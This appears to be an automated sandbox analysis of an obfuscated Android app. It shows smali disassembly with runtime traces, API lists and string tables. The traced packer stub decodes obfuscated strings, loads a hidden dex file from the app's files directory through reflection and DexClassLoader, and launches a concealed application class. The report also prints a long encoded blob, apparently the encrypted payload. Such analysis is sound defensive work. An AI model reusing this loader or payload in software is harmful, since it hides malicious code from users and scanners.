337invoke-virtual {v0, v1, v6}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
338move-result-object v0
339check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
341invoke-virtual {v5, v0}, Lmpcom/crashlytics/android/answers/Answers;->logCustom(Lmpcom/crashlytics/android/answers/CustomEvent;)V
343invoke-virtual {v4, v3}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ(Z)V
344move v0, v3
345goto/16 :goto_d5
346cond_1e2:
347const-string v0, ""
348goto/16 :goto_19b
349cond_1e5:
350const-string v1, ""
351goto/16 :goto_1a9
352cond_1e8: move v0, v2
353goto/16 :goto_d5
354cond_1eb:
355iget-object v0, v1, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
357invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->LmcGi(Landroid/content/Context;)Z
358move-result v0
359if-nez v0, :cond_1f6
360move v0, v2
361goto/16 :goto_e1
362cond_1f6: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
364iget-object v4, v1, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->Odjrct:Landroid/content/Context;
366invoke-direct {v0, v4}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;-><init>(Landroid/content/Context;)V
368invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi()Z
369move-result v0
370if-eqz v0, :cond_206
371move v0, v2
372goto/16 :goto_e1
373cond_206: move v0, v3
374goto/16 :goto_e1
375cond_209:
376iget-object v0, v1, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ:Landroid/os/Handler;
378invoke-virtual {v0, v10}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
379if-eqz p1, :cond_b
381const-string v0, "restart"
383invoke-virtual {p1, v0, v2}, Landroid/content/Intent;->getBooleanExtra(Ljava/lang/String;Z)Z
384move-result v0
385if-eqz v0, :cond_b
387invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ()V
388goto/16 :goto_b
APIs
  • android.app.Application.onCreate
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getDeclaredMethod
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • etxtfvw.cqwwrwk.getClassLoader
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.ClassLoader.loadClass
  • java.lang.Object.getClass
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.getMethod
  • etxtfvw.cqwwrwk.getBaseContext
  • android.app.Instrumentation.newApplication
Strings
  • Ah8TBR0eD00QBwdcNhsTHR4UEwMCDB8=
  • android.app.Application
  • DB80BRcWHwY=
  • onCreate
  • Ah8TBR0eD00QBwdcPgUQBQUCHxIFFxADHh0Z
  • android.app.Instrumentation
  • DRQANgIHBwoSFgMbGAU=
  • CRABFlwbCg0WWTQeFhgQ
  • java.lang.Class
  • Ah8TBR0eD00SGBkGEgUXXzQYHAMOGwU=
  • android.content.Context
  • newApplication
  • CRABFlwbCg0WWTQeFhgQPRgWFhIZ
  • java.lang.ClassLoader
  • Dx4WEzEbChAC
  • CRABFlwbCg0WWSQGBQINFg==
  • java.lang.String
  • loadClass
  • BBQDNB4WGBA9GBYWEhk=
  • getClassLoader
  • AB4aWBENEgEWWBIDAwkHHA0HGRsZBAgZBF06CgofNgcC
  • BBQDNRMEDiAeGQMXDx8=
  • getBaseContext
Position Instruction Meta Information
0.prologue
2invoke-super {p0}, Landroid/app/Application;->onCreate()V
3try_start_3:
4const-string v0, "Ah8TBR0eD00QBwdcNhsTHR4UEwMCDB8="
6invoke-virtual {p0, v0}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
7move-result-object v0
9invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55830
    • p0: android.app.Application
    • Return:
      • class android.app.Application
      • getName: android.app.Application
10move-result-object v0
12const-string v1, "DB80BRcWHwY="
14invoke-virtual {p0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
15move-result-object v1
16const/4 v2, 0x0
17new-array v2, v2, [Ljava/lang/Class;
19invoke-virtual {v0, v1, v2}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55839
    • This:
      • class android.app.Application
      • getName:android.app.Application
    • p0: onCreate
    • p1: [Ljava.lang.Class;@7541048
    • Return:
      • public void android.app.Application.onCreate()
      • getName: onCreate
20move-result-object v0
22const-string v1, "Ah8TBR0eD00QBwdcPgUQBQUCHxIFFxADHh0Z"
24invoke-virtual {p0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
25move-result-object v1
27invoke-static {v1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55847
    • p0: android.app.Instrumentation
    • Return:
      • class android.app.Instrumentation
      • getName: android.app.Instrumentation
28move-result-object v1
30const-string v2, "DRQANgIHBwoSFgMbGAU="
32invoke-virtual {p0, v2}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
33move-result-object v2
34const/4 v3, 0x2
35new-array v3, v3, [Ljava/lang/Class;
36const/4 v4, 0x0
38const-string v5, "CRABFlwbCg0WWTQeFhgQ"
40invoke-virtual {p0, v5}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
41move-result-object v5
43invoke-static {v5}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55858
    • p0: java.lang.Class
    • Return:
      • class java.lang.Class
      • getName: java.lang.Class
44move-result-object v5
45aput-object v5, v3, v4
46const/4 v4, 0x1
48const-string v5, "Ah8TBR0eD00SGBkGEgUXXzQYHAMOGwU="
50invoke-virtual {p0, v5}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
51move-result-object v5
53invoke-static {v5}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55865
    • p0: android.content.Context
    • Return:
      • class android.content.Context
      • getName: android.content.Context
54move-result-object v5
55aput-object v5, v3, v4
57invoke-virtual {v1, v2, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55867
    • This:
      • class android.app.Instrumentation
      • getName:android.app.Instrumentation
    • p0: newApplication
    • p1: [Ljava.lang.Class;@a501b78
    • p1.Arrays.toString: [class java.lang.Class, class android.content.Context]
    • Return:
      • public static android.app.Application android.app.Instrumentation.newApplication(java.lang.Class,android.content.Context) throws java.lang.InstantiationException,java.lang.IllegalAccessException,java.lang.ClassNotFoundException
      • getName: newApplication
58move-result-object v1
59const/4 v2, 0x0
60const/4 v3, 0x2
61new-array v3, v3, [Ljava/lang/Object;
62const/4 v4, 0x0
64const-string v5, "CRABFlwbCg0WWTQeFhgQPRgWFhIZ"
66invoke-virtual {p0, v5}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
67move-result-object v5
69invoke-static {v5}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55877
    • p0: java.lang.ClassLoader
    • Return:
      • class java.lang.ClassLoader
      • getName: java.lang.ClassLoader
70move-result-object v5
72const-string v6, "Dx4WEzEbChAC"
74invoke-virtual {p0, v6}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
75move-result-object v6
76const/4 v7, 0x1
77new-array v7, v7, [Ljava/lang/Class;
78const/4 v8, 0x0
80const-string v9, "CRABFlwbCg0WWSQGBQINFg=="
82invoke-virtual {p0, v9}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
83move-result-object v9
85invoke-static {v9}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 55888
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
86move-result-object v9
87aput-object v9, v7, v8
89invoke-virtual {v5, v6, v7}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55892
    • This:
      • class java.lang.ClassLoader
      • getName:java.lang.ClassLoader
    • p0: loadClass
    • p1: [Ljava.lang.Class;@198762af
    • p1.Arrays.toString: [class java.lang.String]
    • Return:
      • public java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) throws java.lang.ClassNotFoundException
      • getName: loadClass
90move-result-object v5
92invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
93move-result-object v6
95const-string v7, "BBQDNB4WGBA9GBYWEhk="
97invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
98move-result-object v7
99const/4 v8, 0x0
100new-array v8, v8, [Ljava/lang/Class;
102invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55901
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: getClassLoader
    • p1: [Ljava.lang.Class;@2bbd52a8
    • Return:
      • public java.lang.ClassLoader android.content.ContextWrapper.getClassLoader()
      • getName: getClassLoader
103move-result-object v6
104const/4 v7, 0x0
105new-array v7, v7, [Ljava/lang/Object;
107invoke-virtual {v6, p0, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.getClassLoader
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
  • Time: 55905
    • This:
      • public java.lang.ClassLoader android.content.ContextWrapper.getClassLoader()
      • getName:getClassLoader
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@68c0d66
    • Return:
      • dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
108move-result-object v6
109const/4 v7, 0x1
110new-array v7, v7, [Ljava/lang/Object;
111const/4 v8, 0x0
113const-string v9, "AB4aWBENEgEWWBIDAwkHHA0HGRsZBAgZBF06CgofNgcC"
115invoke-virtual {p0, v9}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
116move-result-object v9
117aput-object v9, v7, v8
119invoke-virtual {v5, v6, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.lang.ClassLoader.loadClass
    • This:
      • dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
    • p0: com/czybg/eqtbdmzpklrgyns/MainApp
    • Return:
      • class com.czybg.eqtbdmzpklrgyns.MainApp
      • getName: com.czybg.eqtbdmzpklrgyns.MainApp
  • Time: 55915
    • This:
      • public java.lang.Class java.lang.ClassLoader.loadClass(java.lang.String) throws java.lang.ClassNotFoundException
      • getName:loadClass
    • p0: dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
    • p1: [Ljava.lang.Object;@2cae88fd
    • p1.Arrays.toString: [com/czybg/eqtbdmzpklrgyns/MainApp]
    • Return:
      • class com.czybg.eqtbdmzpklrgyns.MainApp
      • getName: com.czybg.eqtbdmzpklrgyns.MainApp
120move-result-object v5
121aput-object v5, v3, v4
122const/4 v4, 0x1
124invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
125move-result-object v5
127const-string v6, "BBQDNRMEDiAeGQMXDx8="
129invoke-virtual {p0, v6}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
130move-result-object v6
131const/4 v7, 0x0
132new-array v7, v7, [Ljava/lang/Class;
134invoke-virtual {v5, v6, v7}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 55921
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: getBaseContext
    • p1: [Ljava.lang.Class;@2fe5633e
    • Return:
      • public android.content.Context android.content.ContextWrapper.getBaseContext()
      • getName: getBaseContext
135move-result-object v5
136const/4 v6, 0x0
137new-array v6, v6, [Ljava/lang/Object;
139invoke-virtual {v5, p0, v6}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.getBaseContext
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • android.app.ContextImpl@2d30d73d
  • Time: 55923
    • This:
      • public android.content.Context android.content.ContextWrapper.getBaseContext()
      • getName:getBaseContext
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@3fe116ec
    • Return:
      • android.app.ContextImpl@2d30d73d
140move-result-object v5
141aput-object v5, v3, v4
143invoke-virtual {v1, v2, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.app.Instrumentation.newApplication
    • clazz: class com.czybg.eqtbdmzpklrgyns.MainApp
    • context: android.app.ContextImpl@2d30d73d
    • Return:
      • com.czybg.eqtbdmzpklrgyns.MainApp@850754a
  • Time: 55927
    • This:
      • public static android.app.Application android.app.Instrumentation.newApplication(java.lang.Class,android.content.Context) throws java.lang.InstantiationException,java.lang.IllegalAccessException,java.lang.ClassNotFoundException
      • getName:newApplication
    • p0: null
    • p1: [Ljava.lang.Object;@2e5adab5
    • p1.Arrays.toString: [class com.czybg.eqtbdmzpklrgyns.MainApp, android.app.ContextImpl@2d30d73d]
    • Return:
      • com.czybg.eqtbdmzpklrgyns.MainApp@850754a
144move-result-object v1
145const/4 v2, 0x0
146new-array v2, v2, [Ljava/lang/Object;
148invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.app.Application.onCreate
    • This:
      • com.czybg.eqtbdmzpklrgyns.MainApp@850754a
    • Return:
      • null
  • Time: 55958
    • This:
      • public void android.app.Application.onCreate()
      • getName:onCreate
    • p0: com.czybg.eqtbdmzpklrgyns.MainApp@850754a
    • p1: [Ljava.lang.Object;@c219169
    • Return:
      • null
149goto_c3: return-void
150catch_c4: move-exception v0
151goto/16 :goto_c3
APIs
  • android.app.Application.attachBaseContext
  • android.content.Context.getFilesDir
  • java.io.File.<init>
  • android.util.Base64.decode
  • java.lang.String.getBytes
  • pvsaeqhpgq.zvsin.xjZRSFXY
  • java.io.FileOutputStream.<init>
  • java.io.BufferedOutputStream.<init>
  • java.io.BufferedOutputStream.write
  • pvsaeqhpgq.zvsin.closeStream
  • java.io.File.getAbsolutePath
  • android.content.Context.getFilesDir
  • java.io.File.getAbsolutePath
  • android.content.Context.getClassLoader
  • dalvik.system.DexClassLoader.<init>
  • dalvik.system.DexClassLoader.loadClass
  • java.lang.Class.getConstructor
  • java.lang.reflect.Constructor.newInstance
  • java.lang.Object.getClass
  • java.lang.Class.forName
  • java.lang.Class.getDeclaredMethod
  • etxtfvw.cqwwrwk.attachBaseContext
  • java.io.FileNotFoundException.printStackTrace
  • java.io.IOException.printStackTrace
  • java.lang.InstantiationException.printStackTrace
  • java.lang.reflect.InvocationTargetException.printStackTrace
  • java.lang.NoSuchMethodException.printStackTrace
  • java.lang.IllegalAccessException.printStackTrace
  • java.lang.ClassNotFoundException.printStackTrace
Strings
  • sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
  • 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